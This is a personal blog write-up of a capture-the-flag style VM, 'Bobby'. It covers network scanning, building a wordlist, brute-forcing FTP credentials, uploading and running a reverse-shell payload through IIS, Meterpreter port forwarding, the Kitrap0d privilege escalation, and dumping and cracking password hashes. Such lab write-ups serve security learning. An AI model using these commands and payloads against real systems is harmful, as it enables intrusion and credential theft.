Author Image

PaulSec's Blog. Security & lulz.

© 2024 Paul A. CC BY-SA 4.0
Built with Hugo ❤️ hyde-hyde.

Bobby Write-up

May 15, 2014
5 min read

Hi there,

Quick blog post on the VM “Bobby” which is once of the nicest VM I did so far.

Discovery

The first step is always the same: discovering the machine on the network. To do so:

$ nmap -sV 192.168.1.1/24

I managed to retrieve the IP address: 192.168.1.11.

Let’s start to fingerprint the different services to exploit it.

Fingerprinting

Then, I used Nmap to retrieve the services running:

$ nmap -sV 192.168.1.11

Starting Nmap 6.46 ( http://nmap.org ) at 2014-05-15 20:54 CEST
Nmap scan report for 192.168.1.11
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE VERSION
21/tcp  open   ftp     Microsoft ftpd
80/tcp  open   http    Microsoft IIS httpd 5.1
443/tcp closed https
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds

Using Nikto as well:

$ ./nikto.pl -h http://192.168.1.11
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.11
+ Target Hostname:    192.168.1.11
+ Target Port:        80
+ Start Time:         2014-05-15 20:56:29 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/5.1
+ Server leaks inodes via ETags, header found with file /, fields: 0x20b456b8599ce1:a02 
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, PUT, DELETE 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /localstart.asp: This may be interesting...
+ 6544 items checked: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2014-05-15 20:56:50 (GMT2) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The page localstart.asp was asking some credentials but unfortunately I didn’t have them.

I also used DirBuster but I couldn’t find relevant files/directories.

I decided to target the FTP Server. I checked if there was an anonymous access on the FTP but there was none. Unfortunately.

Based on the Web Application I decided to create some custom Wordlist because I didn’t have any clue on what kind of password it could have been .

I used the awesome tool Wyd that extracts single words/strings in some files.

To do so:

wget http://192.168.1.11 -O bobby.html

And then :

./wyd.pl -o bobby.txt bobby.html

The output is:

TheXero-01
Bobby's
blog
Welcome
to
my
personal
blogging
website
but
here
are
a
few
things
about
me
Favourite
film
Matrix
reloaded
music
artist
Daft
Punk
os
Windows
31
bobby

Moreover, I didn’t have any clue on the Username but thanks to the information we retrieved, I thought the username was something like:

Bobby
BOBBY
BOB
BoB
Bob
bob
BOb
...

After cracking it using Hydra, I was able to log in using those credentials: Bob/Matrix. Yay!

ftp> o
(to) 192.168.1.11
Connected to 192.168.1.11.
220 Microsoft FTP Service
Name (192.168.1.11:paul): Bob
331 Password required for Bob.
Password:
230 User Bob logged in.
Remote system type is Windows_NT.
ftp>

Thanks to this access, I found a file called: hint.html:

*#1 This very common Windows file is not downloaded or interpretered but rather executed server side *

Exploitation

The scenario I have now is to create a reverse meterpreter backdoor, upload it, and execute it by getting to the page

http://192.168.1.11/backdoor.exe

I created the payload using msfpayload:

msfpayload windows/shell_reverse_tcp LHOST=192.168.1.68 LPORT=4444 X > /tmp/backdoor.exe

Then, I uploaded the backdoor, had a listener on port 4444 and got a meterpreter session. Good!

However, the meterpreter session stopped few mins later because of some timeout with the Web application". I decided to :

  • Re-execute the backdoor by accessing the file through the Web server
  • Then, after getting the meterpreter session, execute it again: execute -f backdoor.exe
  • Go in backgroud, and restart a handler.

You need to do it fast enough to catch the connection. Otherwise, you’ll wait, and wait..

Then, I got this second meterpreter session and I was sure this would not terminate because of some timeout. It was time to get SYSTEM privileges!

Getting SYSTEM

The first attempt was to use getsystem but unfortunately, I didn’t have enough privileges. I couldn’t migrate to another process.

So, I decided to have a lot at all the processes, and services running on localhost which were not accessible from the outside. That’s where I found the Terminal Server.

I decided to add some route:

route add 127.0.0.1 255.255.255.0 2

I added a route that allowed me target the remote machine with the IP 127.0.0.1. The traffic was tunneled through the meterpreter’s session. Nice trick, like it.

Then, I portforwarded the Terminal Server port: 3389.

I did it like this: portfwd add -l 3389 -p 3389 -r 127.0.0.1

That allowed me to target the local port 3389 and will forward the whole traffic to the remote port 3389. Another nice trick I like with Meterpreter.

Thanks to this, I was able to use rdesktop and log in with Bob account (using password: Matrix). Then, I executed again the backdoor to get a proper user running the process.

I managed to retrieve another meterpreter’s session. I tried to use getsystem command again but no luck. However, I remember about an exploit called Kitrap0d.

I checked if it was still in Metasploit (I remember it was another method in getsystem) and I was able to use it. Linked it to my Meterpreter’s session and “Voilà!”, I got SYSTEM privileges. :-)

The metasploit module is: exploit/windows/local/ms10_015_kitrap0d.

Then, I was able to dump hashes from the system:

Administrator:500:921988ba001dc8e1e1c7c53891cb0efa:e1270db1dd8bf1e32725729695aa1feb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:887f24b0020b273cb90fe7c65f15ca55:c9ee87d435cfd6b9b824e7476e87ee23:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:904376a878474e83e38973eb591a30bf:::
bob:1003:66e5d5ae82299cb6aad3b435b51404ee:42865c72994c34e54d4c5d659fc15b10:::
IUSR_BOBBY:1004:cd15c852291896b9bcb0b504caf52a34:290a598ad6db348292cd06eeda96a626:::
IWAM_BOBBY:1005:2b726cbf313f69b4617d49f3866beaad:1dddcc00ab4bcbe9e21b767f8a9a4d9e:::

And then, I cracked the passwords (for fun) using John The Ripper and Administrator’s password was: P@SSW0RD12345.

I hope you liked the write-up which contains (in my opinion) funny tricks by adding some route, doing port forwarding, etc. Cheers and see you soon!

HTTP Security Headers on top 10k Alexa websites Diving into XSS googles game